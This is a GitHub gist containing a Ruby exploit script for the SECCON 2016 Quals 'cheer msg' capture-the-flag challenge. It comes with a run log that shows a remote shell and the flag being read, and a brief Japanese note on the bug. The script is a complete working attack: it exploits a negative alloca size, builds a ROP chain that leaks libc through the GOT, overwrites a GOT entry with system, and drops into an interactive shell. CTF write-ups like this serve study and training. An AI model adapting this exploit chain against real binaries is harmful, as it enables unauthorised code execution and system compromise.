-
-
Save Charo-IT/8a5175f701a692929f248076e42e23a4 to your computer and use it in GitHub Desktop.
SECCON 2016 Quals - cheer msg
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #coding:ascii-8bit | |
| require "pwnlib" # https://github.com/Charo-IT/pwnlib | |
| remote = ARGV[0] == "r" | |
| if remote | |
| host = "cheermsg.pwn.seccon.jp" | |
| port = 30527 | |
| libc_offset = { | |
| "setbuf" => 0x67b20, | |
| "system" => 0x40310 | |
| } | |
| else | |
| host = "localhost" | |
| port = 54321 | |
| libc_offset = { | |
| "setbuf" => 0x67b20, | |
| "system" => 0x40310 | |
| } | |
| end | |
| offset = { | |
| "printf" => 0x08048430, | |
| "__libc_start_main" => 0x08048490, | |
| "getnline" => 0x080486bd, | |
| "pop1ret" => 0x080487af, | |
| "pop2ret" => 0x080487ae | |
| } | |
| got = { | |
| "setbuf" => 0x0804a00c, | |
| "__libc_start_main" => 0x0804a028 | |
| } | |
| PwnTube.open(host, port) do |tube| | |
| puts "[*] send rop" | |
| tube.recv_until(">> ") | |
| tube.sendline("-158") | |
| tube.recv_until("Name >> ") | |
| payload = "" | |
| payload << [offset["printf"], offset["pop1ret"], got["setbuf"]].pack("L*") | |
| payload << [offset["getnline"], offset["pop2ret"], got["__libc_start_main"], 8].pack("L*") | |
| payload << [offset["__libc_start_main"], 0xdeadbeef, got["__libc_start_main"] + 4].pack("L*") | |
| tube.sendline(payload) | |
| puts "[*] leak libc base" | |
| tube.recv_until("Message : \n") | |
| libc_base = tube.recv(4).unpack("L")[0] - libc_offset["setbuf"] | |
| tube.recv | |
| puts "libc base = 0x%08x" % libc_base | |
| puts "[*] got overwrite" | |
| payload = "" | |
| payload << [libc_base + libc_offset["system"]].pack("L") | |
| payload << "sh\0" | |
| tube.send(payload) | |
| tube.interactive | |
| end |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ ruby solver.rb r | |
| [*] connected | |
| [*] send rop | |
| [*] leak libc base | |
| libc base = 0xf75b9000 | |
| [*] got overwrite | |
| [*] interactive mode | |
| id | |
| uid=10553 gid=1001(cheer_msg) groups=1001(cheer_msg) | |
| ls -la | |
| total 36 | |
| drwxr-xr-x 2 root cheer_msg 4096 Dec 5 15:23 . | |
| drwxr-xr-x 4 root root 4096 Dec 5 15:19 .. | |
| -rw-r--r-- 1 root cheer_msg 220 Dec 5 15:19 .bash_logout | |
| -rw-r--r-- 1 root cheer_msg 3637 Dec 5 15:19 .bashrc | |
| -rw-r--r-- 1 root cheer_msg 675 Dec 5 15:19 .profile | |
| -rwxr-xr-x 1 root cheer_msg 7701 Dec 3 17:06 cheer_msg | |
| -rw-r--r-- 1 root cheer_msg 25 Dec 5 00:01 flag.txt | |
| -rwxr-xr-x 1 root cheer_msg 34 Dec 4 23:20 run.sh | |
| cat flag.txt | |
| SECCON{N40.T_15_ju571c3} | |
| exit | |
| [*] end interactive mode | |
| [*] connection closed |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
allocaに負数を渡すとmainからのリターンアドレス以下が書き換えられるようになるあとは普通のx86なROP